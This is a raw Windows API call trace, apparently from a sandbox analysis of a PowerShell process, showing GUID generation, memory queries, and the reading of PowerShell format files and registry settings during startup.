	[0350.569] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x6c0a03b8, Data2=0xd130, Data3=0x48b9, Data4=([0]=0x9f, [1]=0x45, [2]=0x67, [3]=0x65, [4]=0x41, [5]=0x88, [6]=0x53, [7]=0xf1))) returned 0x0
	[0350.569] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4888eea9, Data2=0x680f, Data3=0x4f2a, Data4=([0]=0xb0, [1]=0x39, [2]=0xf3, [3]=0x17, [4]=0xb7, [5]=0xb9, [6]=0xab, [7]=0x59))) returned 0x0
	[0350.569] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xa2137de3, Data2=0xafca, Data3=0x4db0, Data4=([0]=0x86, [1]=0x10, [2]=0x26, [3]=0x14, [4]=0x64, [5]=0xfc, [6]=0xe1, [7]=0x9b))) returned 0x0
	[0350.569] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf5fa4590, Data2=0x471b, Data3=0x4189, Data4=([0]=0xbe, [1]=0x74, [2]=0xf8, [3]=0x48, [4]=0x9d, [5]=0x3e, [6]=0xbe, [7]=0x4c))) returned 0x0
	[0350.569] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xcf6f7339, Data2=0x2f0b, Data3=0x4148, Data4=([0]=0x9c, [1]=0xa7, [2]=0x31, [3]=0x89, [4]=0xfb, [5]=0xca, [6]=0xbc, [7]=0x32))) returned 0x0
	[0350.570] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd5cc4357, Data2=0xd665, Data3=0x475e, Data4=([0]=0xb4, [1]=0xbb, [2]=0x10, [3]=0x85, [4]=0x80, [5]=0xfe, [6]=0x61, [7]=0xf6))) returned 0x0
	[0350.570] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.570] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x79d299cb, Data2=0x65a3, Data3=0x4665, Data4=([0]=0xb8, [1]=0xcd, [2]=0xc5, [3]=0x3f, [4]=0x9, [5]=0x5d, [6]=0xee, [7]=0x30))) returned 0x0
	[0350.570] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.570] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.571] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xff4c141b, Data2=0xfcfc, Data3=0x49b4, Data4=([0]=0xb3, [1]=0x45, [2]=0xfb, [3]=0x84, [4]=0xdf, [5]=0x52, [6]=0x9c, [7]=0x2e))) returned 0x0
	[0350.571] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xfa33e349, Data2=0xfa48, Data3=0x4da4, Data4=([0]=0x9d, [1]=0xe4, [2]=0xa1, [3]=0xa4, [4]=0x81, [5]=0x53, [6]=0x21, [7]=0xb4))) returned 0x0
	[0350.571] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd5a5c198, Data2=0xf625, Data3=0x45de, Data4=([0]=0xa6, [1]=0xc0, [2]=0x36, [3]=0xfc, [4]=0x16, [5]=0x49, [6]=0xf6, [7]=0x82))) returned 0x0
	[0350.571] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x6134b47, Data2=0xf4f5, Data3=0x4261, Data4=([0]=0x93, [1]=0x6, [2]=0xc9, [3]=0x86, [4]=0xd9, [5]=0xb3, [6]=0xe5, [7]=0x54))) returned 0x0
	[0350.571] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.571] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xbf829f9c, Data2=0xd90c, Data3=0x4296, Data4=([0]=0xbb, [1]=0x92, [2]=0x8d, [3]=0x7d, [4]=0x39, [5]=0x8f, [6]=0x46, [7]=0x75))) returned 0x0
	[0350.571] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.572] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.572] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.572] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.572] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.572] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9967edbe, Data2=0xb5a5, Data3=0x4ce0, Data4=([0]=0x87, [1]=0x33, [2]=0xcb, [3]=0xbb, [4]=0xc9, [5]=0xbc, [6]=0xa6, [7]=0x1f))) returned 0x0
	[0350.573] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5f3255d2, Data2=0x5947, Data3=0x4d15, Data4=([0]=0x9e, [1]=0x2d, [2]=0xf7, [3]=0xf8, [4]=0xa3, [5]=0x1c, [6]=0x33, [7]=0x82))) returned 0x0
	[0350.573] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x97ad695f, Data2=0x9665, Data3=0x4d88, Data4=([0]=0x82, [1]=0xec, [2]=0x91, [3]=0x1d, [4]=0x6f, [5]=0x7f, [6]=0xcc, [7]=0x67))) returned 0x0
	[0350.573] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xb6e54ad7, Data2=0xf9b9, Data3=0x4de3, Data4=([0]=0x82, [1]=0x36, [2]=0xb9, [3]=0xb1, [4]=0x94, [5]=0xa9, [6]=0x14, [7]=0xc3))) returned 0x0
	[0350.573] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x979ad64, Data2=0xe590, Data3=0x4958, Data4=([0]=0x9f, [1]=0xf1, [2]=0xc0, [3]=0xd1, [4]=0x8b, [5]=0x20, [6]=0x2c, [7]=0xf1))) returned 0x0
	[0350.573] VirtualQuery (in: lpAddress=0x1cc3e0, lpBuffer=0x1cd2a0, dwLength=0x30 | out: lpBuffer=0x1cd2a0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.573] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x86fa32f7, Data2=0x42f7, Data3=0x4feb, Data4=([0]=0xae, [1]=0x1f, [2]=0x7c, [3]=0xe2, [4]=0x98, [5]=0xc4, [6]=0x14, [7]=0x44))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xbba796af, Data2=0xae4c, Data3=0x4dca, Data4=([0]=0xa7, [1]=0xed, [2]=0x67, [3]=0x59, [4]=0xc5, [5]=0xe8, [6]=0x23, [7]=0x72))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xdbfac778, Data2=0xed0f, Data3=0x4bcf, Data4=([0]=0xb3, [1]=0x2f, [2]=0x7e, [3]=0x95, [4]=0xb9, [5]=0xc3, [6]=0x93, [7]=0x39))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x6eb2943c, Data2=0x59b4, Data3=0x4cc6, Data4=([0]=0x80, [1]=0xda, [2]=0xf0, [3]=0xe2, [4]=0x8d, [5]=0x7e, [6]=0xca, [7]=0x90))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x45246a92, Data2=0xb6b1, Data3=0x4d49, Data4=([0]=0x87, [1]=0x7e, [2]=0xb1, [3]=0xac, [4]=0xb2, [5]=0x31, [6]=0xd5, [7]=0x76))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x1fe1118a, Data2=0x9420, Data3=0x40de, Data4=([0]=0x9e, [1]=0x7d, [2]=0x40, [3]=0xf6, [4]=0xde, [5]=0x24, [6]=0xa6, [7]=0x29))) returned 0x0
	[0350.574] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x1abfa737, Data2=0x13b6, Data3=0x4c01, Data4=([0]=0xa4, [1]=0xf1, [2]=0xcb, [3]=0x70, [4]=0xae, [5]=0xa4, [6]=0xc9, [7]=0xcf))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd59bf1ce, Data2=0x8ce8, Data3=0x4fb2, Data4=([0]=0x87, [1]=0xda, [2]=0x79, [3]=0x90, [4]=0xbf, [5]=0xe9, [6]=0x6, [7]=0xa8))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xc2cf900b, Data2=0xf310, Data3=0x4a40, Data4=([0]=0x98, [1]=0x50, [2]=0xb6, [3]=0xea, [4]=0xd1, [5]=0xa0, [6]=0x2, [7]=0xa5))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9a109f43, Data2=0x890, Data3=0x42b1, Data4=([0]=0xb4, [1]=0x70, [2]=0xb9, [3]=0xe0, [4]=0xee, [5]=0xe, [6]=0x8e, [7]=0xb5))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf16c07c9, Data2=0xc375, Data3=0x42a1, Data4=([0]=0x83, [1]=0x65, [2]=0xe7, [3]=0x95, [4]=0xcc, [5]=0x7, [6]=0x0, [7]=0x88))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x43d0c8a, Data2=0x3ee6, Data3=0x46a7, Data4=([0]=0x95, [1]=0x3b, [2]=0xb1, [3]=0x86, [4]=0xbf, [5]=0xef, [6]=0xb6, [7]=0xd))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xb9762518, Data2=0x16a0, Data3=0x4174, Data4=([0]=0x90, [1]=0x28, [2]=0x66, [3]=0xbf, [4]=0xc3, [5]=0x39, [6]=0xa, [7]=0x83))) returned 0x0
	[0350.575] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x5427c89, Data2=0xabc1, Data3=0x421e, Data4=([0]=0xb9, [1]=0x8f, [2]=0x9e, [3]=0x62, [4]=0x6d, [5]=0xc7, [6]=0x48, [7]=0xe6))) returned 0x0
	[0350.576] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xeef0392a, Data2=0x604c, Data3=0x48a4, Data4=([0]=0x9b, [1]=0x1d, [2]=0xfe, [3]=0xf5, [4]=0x38, [5]=0xf2, [6]=0xd6, [7]=0x96))) returned 0x0
	[0350.576] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xa6814e6e, Data2=0xd4a9, Data3=0x4280, Data4=([0]=0xa7, [1]=0xab, [2]=0x77, [3]=0x5e, [4]=0x79, [5]=0x18, [6]=0x60, [7]=0xaf))) returned 0x0
	[0350.576] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x61042dbe, Data2=0x6417, Data3=0x44bc, Data4=([0]=0x86, [1]=0xec, [2]=0x9a, [3]=0x9a, [4]=0xbd, [5]=0xac, [6]=0x98, [7]=0xd1))) returned 0x0
	[0350.576] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4225473e, Data2=0x79b5, Data3=0x4bda, Data4=([0]=0xa6, [1]=0xf5, [2]=0x57, [3]=0x3f, [4]=0xa7, [5]=0x78, [6]=0xe6, [7]=0x70))) returned 0x0
	[0350.576] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf078fdc3, Data2=0x4021, Data3=0x473f, Data4=([0]=0x96, [1]=0x3b, [2]=0x7e, [3]=0xe7, [4]=0xc, [5]=0x14, [6]=0x14, [7]=0x1d))) returned 0x0
	[0350.576] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.577] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.577] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.578] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xec61d5e9, Data2=0x5ccf, Data3=0x483e, Data4=([0]=0xad, [1]=0xb, [2]=0x2e, [3]=0xe0, [4]=0xa2, [5]=0xe, [6]=0xcb, [7]=0x77))) returned 0x0
	[0350.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0350.578] SetErrorMode (uMode=0x1) returned 0x1
	[0350.578] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0350.579] GetFileType (hFile=0x320) returned 0x1
	[0350.579] SetErrorMode (uMode=0x1) returned 0x1
	[0350.579] GetFileType (hFile=0x320) returned 0x1
	[0350.579] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.580] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.580] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.580] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.581] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.581] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.581] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x119, lpOverlapped=0x0) returned 1
	[0350.582] ReadFile (in: hFile=0x320, lpBuffer=0x351c5f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x351c5f0*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0350.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0350.582] SetErrorMode (uMode=0x1) returned 0x1
	[0350.582] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0350.582] SetErrorMode (uMode=0x1) returned 0x1
	[0350.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0350.582] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x320) returned 0x0
	[0350.583] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0350.583] CoTaskMemAlloc (cb=0x5a) returned 0x46ed50
	[0350.583] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x46ed50, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0350.583] CoTaskMemFree (pv=0x46ed50) 
	[0350.583] RegCloseKey (hKey=0x320) returned 0x0
	[0350.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0350.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0350.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.585] VirtualQuery (in: lpAddress=0x1cbfe0, lpBuffer=0x1ccea0, dwLength=0x30 | out: lpBuffer=0x1ccea0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.585] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x680d36a5, Data2=0x84eb, Data3=0x48a3, Data4=([0]=0x85, [1]=0x57, [2]=0x22, [3]=0x1f, [4]=0x3c, [5]=0x5, [6]=0xf8, [7]=0xb6))) returned 0x0
	[0350.585] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.586] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf2361640, Data2=0x2580, Data3=0x410a, Data4=([0]=0x87, [1]=0x4b, [2]=0x3e, [3]=0x14, [4]=0x82, [5]=0x65, [6]=0x7b, [7]=0x8))) returned 0x0
	[0350.586] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xf889f15e, Data2=0x4d6f, Data3=0x4b16, Data4=([0]=0xb1, [1]=0xa0, [2]=0x1c, [3]=0xc3, [4]=0x7e, [5]=0x2b, [6]=0x75, [7]=0x5d))) returned 0x0
	[0350.586] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x8b8431fc, Data2=0xc6d4, Data3=0x49bd, Data4=([0]=0x80, [1]=0xa7, [2]=0x35, [3]=0x45, [4]=0x81, [5]=0x61, [6]=0xc2, [7]=0x2))) returned 0x0
	[0350.586] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.586] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0350.586] SetErrorMode (uMode=0x1) returned 0x1
	[0350.587] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0350.587] GetFileType (hFile=0x320) returned 0x1
	[0350.587] SetErrorMode (uMode=0x1) returned 0x1
	[0350.587] GetFileType (hFile=0x320) returned 0x1
	[0350.587] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.588] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.589] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.589] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.589] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.590] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
